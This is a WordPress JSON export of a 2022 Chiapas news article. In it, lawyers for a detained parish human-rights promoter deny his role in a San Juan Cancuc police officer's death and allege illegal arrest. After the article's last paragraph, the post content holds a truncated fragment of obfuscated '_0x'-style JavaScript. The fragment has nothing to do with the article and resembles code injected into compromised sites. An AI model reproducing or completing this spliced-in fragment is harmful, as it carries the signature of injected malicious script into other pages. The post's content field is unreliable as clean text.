{"id":2584,"date":"2022-06-03T03:26:10","date_gmt":"2022-06-03T03:26:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2584"},"modified":"2022-06-03T03:26:11","modified_gmt":"2022-06-03T03:26:11","slug":"aclaran-muerte-de-policia-en-cancuc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2584","title":{"rendered":"Aclaran muerte de Polic\u00eda en Cancuc"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-1.37.46-PM-1024x683.jpeg\" alt=\"\" class=\"wp-image-2585\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-1.37.46-PM-1024x683.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-1.37.46-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-1.37.46-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-1.37.46-PM.jpeg 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. &#8211; Abogados de Manuel S\u00e1ntiz Cruz desmintieron que su cliente haya tenido algo que ver con la muerte de un elemento de la Polic\u00eda Municipal de San Juan Canc\u00fac, por lo que piden la liberaci\u00f3n de este promotor de los derechos humanos de la parroquia de ese municipio. \u201cEl domingo un polic\u00eda municipal que falleci\u00f3 se encontraba en estado de ebriedad, se cay\u00f3 en un barranco, lo fueron a levantar porque estaba borracho, solicitaron a la Polic\u00eda Municipal, porque era su compa\u00f1ero, eran 50 pobladores de la comunidad, se lo llevaron y luego dijeron que hab\u00eda muerto, pero ya se encontraba bajo custodia de la Polic\u00eda Municipal de San Juan Canc\u00fac\u201d, manifestaron. Detall\u00f3 que a las 7 de la ma\u00f1ana de ese mismo d\u00eda fue detenido Manuel S\u00e1ntiz Cruz que es defensor de los derechos humanos de la Parroquia, junto con otra persona Agust\u00edn P\u00e9rez Dom\u00ednguez y Juan Velasco Aguilar, por lo que fueron trasladados a San Crist\u00f3bal y por lo menos en un periodo de 24 horas no se supo nada de ellos. \u201cNosotros nos enteramos el lunes a las 8 de la ma\u00f1ana, fuimos a buscarlos a la Fiscal\u00eda Ind\u00edgena no nos daban raz\u00f3n y al final, a las 10 nos comentaron que Manuel y las otras personas hab\u00edan sido detenidos por agentes de la Polic\u00eda Especializada, asumimos la representaci\u00f3n de Manuel somos sus abogados, aportamos 3 testigos para acreditar la detenci\u00f3n ilegal de Manuel, los detuvieron por posesi\u00f3n de mariguana que eso era mentira, hab\u00edan sido detenidos en Canc\u00fac\u201d, dijo. Por lo anterior, piden a las autoridades correspondientes no violar los derechos de Manuel S\u00e1ntiz, ya que es inocente de las acusaciones que le imputan, por lo que continuar\u00e1n presionando para que no se cometa una injusticia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas. &#8211; Abogados de Manuel S\u00e1ntiz Cruz desmintieron que su cliente haya tenido algo que ver con la muerte de un elemento de la Polic\u00eda Municipal de San Juan Canc\u00fac, por lo que piden la liberaci\u00f3n de este promotor de los derechos humanos de la parroquia de ese municipio. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2585,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2584","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2584","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2584"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2584\/revisions"}],"predecessor-version":[{"id":2586,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2584\/revisions\/2586"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2585"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2584"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2584"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2584"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}